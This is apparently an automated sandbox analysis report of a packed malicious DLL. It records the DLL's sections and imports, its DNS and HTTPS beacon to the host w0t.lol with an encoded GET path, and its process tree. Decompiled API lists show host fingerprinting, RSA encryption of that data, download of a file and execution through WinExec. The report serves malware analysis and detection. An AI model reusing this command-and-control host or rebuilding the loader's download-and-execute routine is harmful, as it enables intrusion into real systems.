.rdata | 0xf000 | 0x837 | 0x1000 | 3936868e1249266d25c6c43831ecaa9c | False | 0.298583984375 | data | 2.7036873961689896 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x10000 | 0x24200 | 0x24000 | 728fa214bf78861ed2be0464e5b2e851 | False | 0.2669542100694444 | data | 6.204494425770218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
z4g | 0x35000 | 0x7a4cf | 0x7b000 | 398319310efec22a8e1707da92eb10be | False | 0.9946666190294715 | data | 7.995421677975023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qm | 0xb0000 | 0x70e8f | 0x71000 | fa2c61d59fecbab30f271e9278c4e647 | False | 0.9991314643252213 | data | 7.99943170498821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
L | 0x121000 | 0xe7504 | 0xe8000 | d17b37313f02147b68341a0bca06f4bf | False | 0.9966262291217672 | data | 7.997710795649098 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
CONST | 0x209000 | 0xd88 | 0x1000 | b052a42265a0ef04c82877e017c33121 | False | 0.7548828125 | data | 7.057514057791508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3 | 0x20a000 | 0x13a0 | 0x2000 | 6c371933aac1ef87a68049c0aca61de8 | False | 0.5489501953125 | data | 5.6043812950914065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
buicKDZl | 0x20c000 | 0xf0e | 0x1000 | ecb3c30a4d5685f7394de862efbb63cd | False | 0.756591796875 | data | 6.855147821668895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
CRT | 0x20d000 | 0x1920 | 0x2000 | f44e399cc7eb92f94e27ac6c5b5c2312 | False | 0.7213134765625 | data | 6.598433129737103 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x20f000 | 0x6d28 | 0x7000 | 85992fe593ac7adce6fc2d273bfa339c | False | 0.30946568080357145 | data | 5.688832279317778 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x216000 | 0xada8 | 0xb000 | 96222f6edd2ec89fd0af45e507598034 | False | 0.1380282315340909 | data | 5.6863785572940495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x20f310 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5469043151969981
RT_ICON | 0x2103b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.600177304964539
RT_ICON | 0x210820 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5107879924953096
RT_ICON | 0x2118c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.648936170212766
RT_ICON | 0x211d30 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5668386491557224
RT_ICON | 0x212dd8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.6551418439716312
RT_ICON | 0x213240 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5905253283302064
RT_ICON | 0x2142e8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.6826241134751773
RT_ICON | 0x214750 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5466697936210131
RT_ICON | 0x2157f8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.6445035460992907
RT_GROUP_ICON | 0x215c60 | 0x22 | data | Russian | Russia | 1.0588235294117647
RT_GROUP_ICON | 0x215c88 | 0x22 | data | Russian | Russia | 1.0588235294117647
RT_GROUP_ICON | 0x215cb0 | 0x22 | data | Russian | Russia | 1.0588235294117647
RT_GROUP_ICON | 0x215cd8 | 0x22 | data | Russian | Russia | 1.0588235294117647
RT_GROUP_ICON | 0x215d00 | 0x22 | data | Russian | Russia | 1.0588235294117647
DLL | Import
OLEAUT32.dll | VarBoolFromR4
KERNEL32.dll | GetSystemTimeAsFileTime, GetStdHandle, SuspendThread, LoadLibraryExW, OutputDebugStringA, GetModuleFileNameW, GetBinaryTypeW
GDI32.dll | BitBlt
Language of compilation system | Country where language is spoken
Russian | Russia
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 13:12:33.667886019 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:33.667989969 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:33.668176889 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:33.694613934 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:33.694696903 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:33.935889959 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:33.936254978 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:33.967852116 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:33.967924118 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:33.968811035 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:33.969001055 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:33.970993042 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:34.012290001 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:36.115550041 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:36.115786076 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:36.115868092 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:36.116086960 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:36.116092920 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:36.116266966 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:36.117410898 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:36.117410898 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Sep 26, 2024 13:12:36.117497921 CEST | 443 | 49757 | 104.21.69.9 | 192.168.11.20
Sep 26, 2024 13:12:36.117641926 CEST | 49757 | 443 | 192.168.11.20 | 104.21.69.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 13:12:33.544146061 CEST | 58992 | 53 | 192.168.11.20 | 1.1.1.1
Sep 26, 2024 13:12:33.661926031 CEST | 53 | 58992 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 13:12:33.544146061 CEST | 192.168.11.20 | 1.1.1.1 | 0x5b63 | Standard query (0) | w0t.lol | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 13:12:33.661926031 CEST | 1.1.1.1 | 192.168.11.20 | 0x5b63 | No error (0) | w0t.lol | | 104.21.69.9 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 13:12:33.661926031 CEST | 1.1.1.1 | 192.168.11.20 | 0x5b63 | No error (0) | w0t.lol | | 172.67.202.143 | A (IP address) | IN (0x0001) | false
    • w0t.lol
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.11.2049757104.21.69.9443916C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-09-26 11:12:33 UTC714OUTGET /u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: w0t.lol
    Connection: Keep-Alive
    2024-09-26 11:12:36 UTC306INHTTP/1.1 404 Not Found
    Date: Thu, 26 Sep 2024 11:12:36 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: no-cache, no-store, must-revalidate
    CF-Cache-Status: DYNAMIC
    Speculation-Rules: "/cdn-cgi/speculation"
    Server: cloudflare
    CF-RAY: 8c92d1d5482d3af0-IAD
    2024-09-26 11:12:36 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
    2024-09-26 11:12:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0



    Target ID:0
    Start time:07:11:36
    Start date:26/09/2024
    Path:C:\Windows\System32\loaddll32.exe
    Wow64 process (32bit):true
    Commandline:loaddll32.exe "C:\Users\user\Desktop\e.dll"
    Imagebase:0x5d0000
    File size:126'464 bytes
    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:1
    Start time:07:11:36
    Start date:26/09/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff750020000
    File size:875'008 bytes
    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:2
    Start time:07:11:36
    Start date:26/09/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1
    Imagebase:0x490000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:3
    Start time:07:11:36
    Start date:26/09/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe "C:\Users\user\Desktop\e.dll",#1
    Imagebase:0xd10000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true


      Execution Graph

      Execution Coverage:7%
      Dynamic/Decrypted Code Coverage:100%
      Signature Coverage:20%
      Total number of Nodes:15
      Total number of Limit Nodes:1

      Callgraph


      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.27456582362.0000000000C5B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
      • Associated: 00000000.00000002.27456552819.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456582362.0000000000C51000.00000020.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456677924.0000000000C60000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456733312.0000000000C85000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27457175125.0000000000E5F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_c50000_loaddll32.jbxd
      Similarity
      • API ID: BinaryType
      • String ID:
      • API String ID: 3726996659-0
      Memory Dump Source
      • Source File: 00000000.00000002.27456582362.0000000000C5B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
      • Associated: 00000000.00000002.27456552819.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456582362.0000000000C51000.00000020.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456677924.0000000000C60000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456733312.0000000000C85000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27457175125.0000000000E5F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_c50000_loaddll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      Memory Dump Source
      • Source File: 00000000.00000002.27456582362.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
      • Associated: 00000000.00000002.27456552819.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456582362.0000000000C5B000.00000020.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456677924.0000000000C60000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27456733312.0000000000C85000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.27457175125.0000000000E5F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_c50000_loaddll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:

      Execution Graph

      Execution Coverage:28.9%
      Dynamic/Decrypted Code Coverage:99%
      Signature Coverage:81.7%
      Total number of Nodes:104
      Total number of Limit Nodes:8

      Control-flow Graph

      APIs
      • GetTickCount.KERNEL32 ref: 27AC116C
      • SHGetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,?,?), ref: 27AC11B9
      • SHSetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,00000001,?), ref: 27AC11E0
      • UuidCreateSequential.RPCRT4(?), ref: 27AC11F5
      • sprintf.NTDLL ref: 27AC122C
      • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC124F
      • GlobalAlloc.KERNEL32(00000040,00001000,00000000,?,00000000), ref: 27AC1266
      • sprintf.NTDLL ref: 27AC128C
      • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC12CB
      • sprintf.NTDLL ref: 27AC13CA
      • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC1401
      • sprintf.NTDLL ref: 27AC1434
      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 27AC144A
      • sprintf.NTDLL ref: 27AC145F
      • GetCommandLineA.KERNEL32 ref: 27AC1467
      • sprintf.NTDLL ref: 27AC1475
      • memset.NTDLL ref: 27AC1482
      • CryptBinaryToStringA.CRYPT32(?,00000030,4000000C,?,?,?,?,?,00000000,00000030,00000000), ref: 27AC14F3
      • sprintf.NTDLL ref: 27AC150C
      • memset.NTDLL ref: 27AC155E
      • EnumDisplaySettingsA.USER32(?,000000FF,?), ref: 27AC1578
      • sprintf.NTDLL ref: 27AC15AE
      • memcpy.NTDLL(0000000C,00000000,?), ref: 27AC165B
      • memcpy.NTDLL(00000080,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000030,00000000), ref: 27AC167D
      • memset.NTDLL ref: 27AC16BF
      • GlobalFree.KERNEL32(00000000), ref: 27AC16C8
      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,?,00000000,?,00000000), ref: 27AC1703
      • CryptDecodeObjectEx.CRYPT32(00010001,00000008,27AC1000,000000A2,00008000,00000000,?,00000000), ref: 27AC1738
      • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,?), ref: 27AC1755
      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000080), ref: 27AC1774
      • CryptBinaryToStringA.CRYPT32(00000000,?,40000001,?,00000000), ref: 27AC17D6
      • memset.NTDLL ref: 27AC17E3
      • GlobalFree.KERNEL32(00000000), ref: 27AC17EC
      • URLDownloadToCacheFileA.URLMON(00000000,00000000,?,00000105,00000000,00000000), ref: 27AC183B
      • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000105,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000), ref: 27AC1843
      • memset.NTDLL ref: 27AC184C
      • GlobalFree.KERNEL32(00000000), ref: 27AC1855
      • _lopen.KERNEL32(?,00000000), ref: 27AC1868
      • _hread.KERNEL32(00000000,?,00000002), ref: 27AC187D
      • _lclose.KERNEL32(00000000), ref: 27AC1884
      • WinExec.KERNEL32(?,00000000), ref: 27AC189F
      • GlobalFree.KERNEL32(00000000), ref: 27AC18B8
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.22961902767.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
      Similarity
      • API ID: sprintf$Crypt$Globalmemset$Free$ComputeCrc32$BinaryFileStringValuememcpy$AcquireAllocCacheCommandContextCountCreateDecodeDisplayDownloadEncryptEnumExecImportInfoLineModuleNameObjectPublicSequentialSettingsTickUuid_hread_lclose_lopenlstrlen
      • String ID: %02x%02x%02x%02x%02x%02x$%08x%08x*%s*%u$*%s$*%s_%s_%u_%u_%u$0$COMPUTERNAME$SOFTWARE\Microsoft\Mediaplayer$USERNAME$lol/$s://$w0t.$wnp^$?kL
      • API String ID: 3929119689-2541717829

      Control-flow Graph

      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: 5`oj$5`oj
      • API String ID: 0-1924437217

      Control-flow Graph

      APIs
      • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 030000A0
      • LoadLibraryA.KERNEL32(?), ref: 0300020D
      • LdrGetProcedureAddress.NTDLL(00000000,?,00000000,?), ref: 0300025A
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0300035F
      Memory Dump Source
      • Source File: 00000003.00000002.22959828960.0000000003000000.00000020.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_3000000_rundll32.jbxd
      Similarity
      • API ID: Virtual$AddressAllocLibraryLoadProcedureProtect
      • String ID:
      • API String ID: 3829562780-0
      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 064D1321
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 064D1627
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 064D16ED
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID: Virtual$Protect$Alloc
      • String ID:
      • API String ID: 2541858876-0
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: R4Vd
      • API String ID: 0-3306949354
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: !$MSR$ecf
      • API String ID: 0-784032842
      APIs
      • VirtualAlloc.KERNEL32(00000000,?,?,?), ref: 04FDE679
      • VirtualAlloc.KERNEL32(00000000,?,?,?), ref: 04FDF73C
      Memory Dump Source
      • Source File: 00000003.00000003.22528407120.0000000004FDD000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FDD000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_4fdd000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 4ef5e6f3f24ca39d9c83c0dc6a6c31688bf2c78410e3a90c5f5409f422b3077b
      • Instruction ID: 7c81ab0deb12492b4201463ca405a533e56cce0e72a8e2f0ec11e72d6d32189b
      • Opcode Fuzzy Hash: 4ef5e6f3f24ca39d9c83c0dc6a6c31688bf2c78410e3a90c5f5409f422b3077b
      • Instruction Fuzzy Hash: 7B030936A047628FD728CE29C8D47DAB3D3BFC4314F598A3DD889CB245DB7598468B81
      APIs
      • FindNextFileW.KERNEL32(?,?), ref: 0660DCD2
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: FileFindNext
      • String ID: L
      • API String ID: 2029273394-2909332022
      • Opcode ID: fb953a26b277d42a089ad1b34f58383574c82e397c87c262484869db7d63a950
      • Instruction ID: fb28bdc8039056efdb2e89f7466999b5097d4410af9d796249516493be1a2909
      • Opcode Fuzzy Hash: fb953a26b277d42a089ad1b34f58383574c82e397c87c262484869db7d63a950
      • Instruction Fuzzy Hash: EB919C329087518FD314CF28C88065BB7E2FFC9314F668A29E9959B394D775F806CB91
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: D$t
      • API String ID: 0-777169037
      • Opcode ID: 8b3af3fb245a4836f2b62cac415770770b4c7dae47989a2f4c7f668feb886fb2
      • Instruction ID: b4908e209f789645f749e5b7cf09107259e0307fa3cfdbc0b38bbb4d786a3636
      • Opcode Fuzzy Hash: 8b3af3fb245a4836f2b62cac415770770b4c7dae47989a2f4c7f668feb886fb2
      • Instruction Fuzzy Hash: 1E8260366193818FD778CF68C5C4A9BF7E6BBC9310F158A2DC4898B394DB34A945CB81
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: Sleep
      • String ID: 'RX0
      • API String ID: 3472027048-656561589
      • Opcode ID: 4385d83b41b040af81cd74dcc48b9b0143d3b6a66f068ec091eaf1c58173d332
      • Instruction ID: 1acfdb5e8f7007c9845f842c8a24bda33db47a37e5d767ae9e34aa45c3384e4e
      • Opcode Fuzzy Hash: 4385d83b41b040af81cd74dcc48b9b0143d3b6a66f068ec091eaf1c58173d332
      • Instruction Fuzzy Hash: 7971BF72A187558FD304CE39C89052BBBE7BBD8310F1A892DE595D7354DB71E902CB81

      Control-flow Graph

      control_flow_graph 349 4d322a8-4d322e2 350 4d322e6-4d3231c 349->350 350->350 351 4d3231e-4d3235d VirtualProtect 350->351 352 4d32361-4d3236d 351->352 355 4d31d18-4d31d20 352->355 355->355 356 4d31d22-4d31dec call 4d347a8 VirtualAlloc call 4d347a8 355->356 360 4d31df1-4d31e8a call 4d347a8 * 2 356->360 360->352
      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 04D31DAA
      • VirtualProtect.KERNEL32(?,00000800,?,?), ref: 04D3235A
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID: Virtual$AllocProtect
      • String ID:
      • API String ID: 2447062925-0
      • Opcode ID: e3d0b00510a6c716ea44dc0f727e4e475cbbcd87a214dbe7fa62648bb9f1230c
      • Instruction ID: cabdba12d09775de6694d35534ce1e40069147aa332734ca3e6efa9e5c6f1f97
      • Opcode Fuzzy Hash: e3d0b00510a6c716ea44dc0f727e4e475cbbcd87a214dbe7fa62648bb9f1230c
      • Instruction Fuzzy Hash: 4A61A1B26043418FD354CF29C844BAABBE6EBC5320F15CA6ED499CB3A1DB34D506CB51
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: af6082df605ef423f6a591495e8b070252e7f204abbacca12acb5cfa1d5dd03c
      • Instruction ID: 028d529aaa84494d15fd7d51c77eec61a2470cafdf156d468499497323bd811f
      • Opcode Fuzzy Hash: af6082df605ef423f6a591495e8b070252e7f204abbacca12acb5cfa1d5dd03c
      • Instruction Fuzzy Hash: 07B2C6366183518FD778CE28C9C57DBF7E6BBC8310F198A3DD489DB284DA74A9058B81
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: 0218d85dad2e021a5d5be0b55c3442357ee7efc2edda6de51b4e07b52941fb1f
      • Instruction ID: fec16bce1cf8685d7ed2eaaad44b94065782a4854809fc64f599fd53c1014e11
      • Opcode Fuzzy Hash: 0218d85dad2e021a5d5be0b55c3442357ee7efc2edda6de51b4e07b52941fb1f
      • Instruction Fuzzy Hash: BEF1A076D001298FDB24CF29C850BADB7B6FF89310F1581AAD409B7794D774AA86CF90
      APIs
      • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 066250C4
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: Open
      • String ID:
